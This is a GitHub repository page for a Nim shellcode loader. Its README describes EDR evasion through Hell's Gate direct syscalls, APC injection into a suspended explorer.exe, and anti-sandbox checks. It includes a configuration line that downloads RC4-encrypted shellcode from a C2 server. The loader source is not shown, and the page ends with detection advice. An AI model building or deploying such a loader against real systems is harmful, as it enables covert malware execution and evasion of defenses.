Skip to content

hadhub/nim-loader

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

37 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
config.nims
config.nims
 
 
dropper.nim
dropper.nim
 
 
encode2rc4.nim
encode2rc4.nim
 
 
nim.cfg
nim.cfg
 
 

Repository files navigation

Shellcode Injection via Direct Syscalls (Hell's Gate)

Overview

This project demonstrates advanced Windows process injection techniques using direct system calls to bypass EDR (Endpoint Detection and Response) hooks. It implements the "Hell's Gate" technique to extract syscall numbers directly from ntdll.dll and execute them without going through hooked API functions.

Features

  • Direct Syscall Execution: Bypasses userland API hooks by invoking syscalls directly
  • Hell's Gate Technique: Dynamically extracts syscall numbers from ntdll.dll at runtime
  • Process Hollowing: Creates a suspended process and injects shellcode via APC (Asynchronous Procedure Call)
  • RC4 Encryption: Downloads and decrypts shellcode from a remote server
  • Anti-Sandbox: Basic memory checks to detect virtual environments

Technical Implementation

Direct Syscalls

The project implements three core NT functions via direct syscalls:

  1. NtAllocateVirtualMemory - Allocates memory in the target process
  2. NtWriteVirtualMemory - Writes shellcode to allocated memory
  3. NtQueueApcThread - Queues an APC to execute the shellcode

Syscall Stub Generation

For each syscall, the code:

  1. Extracts the syscall number from the corresponding function in ntdll.dll
  2. Validates the function prologue pattern (4C 8B D1 B8)
  3. Generates a minimal assembly stub in executable memory
  4. Executes the syscall directly

Injection Flow

1. Download encrypted shellcode from C2 server
2. Decrypt using RC4
3. Create suspended explorer.exe process
4. Allocate RWX memory via NtAllocateVirtualMemory (syscall)
5. Write shellcode via NtWriteVirtualMemory (syscall)
6. Queue APC via NtQueueApcThread (syscall)
7. Resume thread to trigger execution

Requirements

  • Windows 10/11 (x64)
  • Nim compiler
  • Required Nim packages:
    • winim
    • httpclient
    • RC4
nimble install winim RC4

Compilation

Debug :

nim c main.nim

For smaller binary size:

nim c -d:st3 main.nim

Configuration

Update the C2 server URL in the code:

data = client.getContent("http://192.168.1.19:8080/api_local")

Update the RC4 key:

key : string = "kernel32.dll"

Disclaimer

⚠️ FOR EDUCATIONAL PURPOSES ONLY

This code is provided for educational and research purposes to understand advanced malware techniques and improve defensive security measures. Unauthorized use of this code for malicious purposes is illegal and unethical.

  • Only use in authorized environments (your own lab, with explicit permission)
  • Never deploy against systems you don't own or have written permission to test
  • The authors assume no liability for misuse of this code

Detection & Defense

Security professionals can detect this technique by:

  • Monitoring for direct syscall execution patterns
  • Detecting unusual assembly stub creation in memory
  • Analyzing process creation with suspended threads
  • Monitoring APC queue operations
  • Network traffic analysis for encrypted payload downloads

License

This project is licensed under the MIT License - see the LICENSE file for details.

This project was generated in part with AI | Contributions and improvements welcome

About

simple nim loader

Topics

malware-development shellcode-loader redteam

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages